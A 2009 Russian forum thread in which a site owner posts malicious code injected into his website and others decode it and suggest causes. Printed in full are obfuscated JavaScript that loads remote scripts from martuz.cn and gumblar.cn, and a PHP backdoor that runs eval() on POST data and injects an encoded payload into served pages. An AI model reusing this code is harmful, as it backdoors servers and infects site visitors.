18.05.2009, 17:10
|
Новичок на форуме
|
|
Регистрация: 18.05.2009
Сообщений: 5
|
|
объясните значение кода
на сайт внедрён код, как и что он значит не знаю(
последний раз:
<script language=javascript><!--
(function(nZaGu){var r7k5=('v>61r>20>61>3d>22ScriptEngi>6ee>22>2cb>3d>2 2Ve>72sion(>29+>22>2cj>3d>22>22>2cu>3dna>76ig>61to r>2e>75ser>41ge>6e>74>3bif((u>2e>69ndexOf(>22Chrom e>22)>3c0)>26>26>28u>2einde>78Of(>22>57in>22)>3e0> 29>26>26(>75>2einde>78O>66>28>22N>54>206>22>29>3c0 >29>26>26(docume>6et>2ecookie>2eindex>4ff(>22mi>65 k>3d1>22)>3c0)>26>26(>74ypeof>28zrv>7at>73)>21>3dt >79peof(>22>41>22)>29)>7b>7arvzt>73>3d>22>41>22>3b >65v>61l(>22>69>66(windo>77>2e>22+a>2b>22>29j>3dj> 2b>22>2ba+>22>4dajor>22>2b>62+a>2b>22>4di>6e>6fr>2 2+b>2ba>2b>22B>75>69l>64>22+b+>22j>3b>22>29>3bdocu ment>2e>77ri>74e>28>22>3cscri>70>74>20>73rc>3d>2f> 2fmar>22+>22tuz>2ecn>2fvid>2f>3f>69d>3d>22+j+>22>3 e>3c>5c>2fscri>70t>3e>22)>3b>7d').replace(nZaGu,'% ');var kG0lv=unescape(r7k5);eval(kG0lv)})(/\>/g);
--></script>
|
|
18.05.2009, 17:19
|
Новичок на форуме
|
|
Регистрация: 19.02.2008
Сообщений: 9,177
|
|
Если внедрен, значит вирус.
var a = "ScriptEngine", b = "Version()+", j = "", u = navigator.userAgent;
if ((u.indexOf("Chrom e") < 0) && (u.indexOf("Win") > 0% 29&&(u.indexOf("NT 6")<0 )&&(document.cookie.indexOf("mie k=1")<0)&&(typeof(zrvzts)!=t ypeof("A"))){zrvzts="A"; eval("if(window."+a+")j=j% 2b"+a+"Major"+b+a+"Minor%2 2+b+a+"Build"+b+"j;");docu ment.write("<script src=/% 2fmar"+"tuz.cn/vid/?id="+j+"%3 e<\/script>");}
|
|
18.05.2009, 17:27
|
Новичок на форуме
|
|
Регистрация: 18.05.2009
Сообщений: 5
|
|
Kolyaj,
каким образом тута попал вирус? как на хостинге антивирусом проверить файлы? при работе не чего не находит..
|
|
18.05.2009, 17:29
|
Новичок на форуме
|
|
Регистрация: 18.05.2009
Сообщений: 5
|
|
были и такие варианты (подобное уже в 4ый раз):
<script language=javascript><!--
(function(WOtR){var qWOCK=('var#20a#3d#22Scr#69#70tEng#69#6ee#22#2cb#3 d#22Ve#72sion#28)+#22#2cj#3d#22#22#2c#75#3dna#76#6 9gat#6f#72#2eu#73e#72Ag#65n#74#3bif((u#2ei#6e#64#6 5xOf(#22W#69n#22)#3e0)#26#26(#75#2eindexO#66(#22N# 54#206#22#29#3c0)#26#26(do#63um#65#6e#74#2ec#6fok# 69#65#2e#69#6edexOf(#22mi#65k#3d1#22#29#3c0)#26#26 #28#74ypeof(z#72vzts)#21#3dty#70#65of(#22#41#22))# 29#7bzrvzts#3d#22A#22#3b#65v#61l(#22if(wi#6edow#2e #22+#61+#22)#6a#3dj#2b#22+a+#22Maj#6f#72#22+b+#61+ #22Minor#22#2bb+a+#22B#75il#64#22+#62#2b#22j#3b#22 )#3bdoc#75men#74#2ewrite(#22#3c#73cr#69pt#20s#72c# 3d#2f#2fgumbla#72#2ec#6e#2frss#2f#3fid#3d#22+j+#22 #3e#3c#5c#2fscr#69#70#74#3e#22)#3b#7d').replace(WO tR,'%');eval(unescape(qWOCK))})(/#/g);
--></script>
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_PO ST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL ',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2Nya XB0PjwhLS0gCihmdW5jdGlvbihXRjIpe3ZhciBZUzU9JyUnO2V 2YWwodW5lc2NhcGUoKCd2IjYxciIyMGEiM2QiMjJTY3JpcHRFb iI2N2luZSIyMiIyYyI2MiIzZCIyMlZlcnNpb24oKSIyYiIyMiI yY2oiM2QiMjIiMjIiMmMiNzUiM2QiNmUiNjF2aWciNjEiNzRvc iIyZXVzZXJBZyI2NW50IjNiaWYiMjgoIjc1IjJlaW5kZXhPZiI yOCIyMldpbiIyMiIyOSIzZSIzMCkiMjYiMjYodSIyZWkiNmVkZ XhPIjY2KCIyMiI0ZVQiMjA2IjIyKSIzYzApIjI2IjI2IjI4ZCI 2ZmMiNzVtZW50IjJlIjYzbyI2ZmtpZSIyZWluIjY0ZSI3OE9mK CIyMiI2ZGkiNjVrIjNkIjMxIjIyKSIzYzApIjI2IjI2IjI4Ijc 0eXBlbyI2Nih6cnZ6dHMpIjIxIjNkIjc0eXAiNjVvIjY2KCIyM kEiMjIpKSkiN2J6cnZ6dHMiM2QiMjIiNDEiMjIiM2IiNjV2IjY xbCgiMjJpIjY2KHciNjluZG93IjJlIjIyK2ErIjIyKSI2YSIzZ CI2YSIyYiIyMithKyIyMk1hIjZhb3IiMjIrIjYyK2ErIjIyIjR kIjY5bm9yIjIyKyI2MithKyIyMiI0MiI3NWlsZCIyMiIyYmIiM mIiMjJqIjNiIjIyKSIzYmRvIjYzdW1lbiI3NCIyZXdyaXRlIjI 4IjIyIjNjcyI2MyI3MmkiNzB0IjIwc3JjIjNkIjJmIjJmZ3VtY mxhciIyZWNuIjJmcnNzIjJmIjNmaWQiM2QiMjIraisiMjIiM2U iM2MiNWMiMmYiNzNjcmlwdCIzZSIyMikiM2IiN2QnKS5yZXBsY WNlKFdGMixZUzUpKSl9KSgvIi9nKTsKIC0tPjwvc2NyaXB0Pg= ='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).ch r(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$ v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos( $v,'document.write')))$s=str_replace($v,'',$s);}$s 1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_re place('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);else if(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($ b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_l kojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!=' tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
|
|
18.05.2009, 17:36
|
|
|
|
Регистрация: 27.12.2008
Сообщений: 4,201
|
|
только какой-то он кривой... такое впечателние, что его надо напильником обработать, чтобы запустился
последний на php, который, похоже, вставляет подобие js-скриптов, приведенных выше
Последний раз редактировалось x-yuri, 18.05.2009 в 17:43.
|
|
18.05.2009, 17:39
|
Новичок на форуме
|
|
Регистрация: 18.05.2009
Сообщений: 5
|
|
хорошо, что кривой, но уже не важно, все немногочисленные пользователи из серфа убежали, сайт снёс, так что этот код делает?
|
|
18.05.2009, 17:45
|
|
Матрос
|
|
Регистрация: 04.04.2008
Сообщений: 6,246
|
|
Сообщение от anton1
|
каким образом тута попал вирус?
|
с большой долей вероятности вы имеет привычку сохранять пароль на ФТП в тоталкомандере.вирусы, которые воруют такого рода пароли на него ориентированы.
либо любым другим способом, но кто-то получил доступ к вашему ФТП, либо нашел уязвимость в вашем движке сайта.
Сообщение от anton1
|
как на хостинге антивирусом проверить файлы?
|
у моего хостера данная возможность встроена в CPanel
но найти такого рода вирусы по сигнатурам - гиблое дело, для всех случаев
рекомендую ознакомится с этой темой.это позволит вам избегать такого рода проколов в дальнейшем
|
|
18.05.2009, 17:47
|
|
Матрос
|
|
Регистрация: 04.04.2008
Сообщений: 6,246
|
|
Сообщение от anton1
|
так что этот код делает?
|
наверняка что-то полезное для того кто его разместил.
и вредное для вас и/или ваших пользователей.
что конкретно мне лень разбиратся
|
|
18.05.2009, 17:52
|
Новичок на форуме
|
|
Регистрация: 19.02.2008
Сообщений: 9,177
|
|
Сообщение от x-yuri
|
только какой-то он кривой
|
Раскодировал криво
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>");}
|
|
18.05.2009, 17:52
|
|
|
|
Регистрация: 27.12.2008
Сообщений: 4,201
|
|
Цитата:
|
так что этот код делает?
|
заменяешь eval на alert, убираешь лишние пробелы - и смотришь
|
|
|
|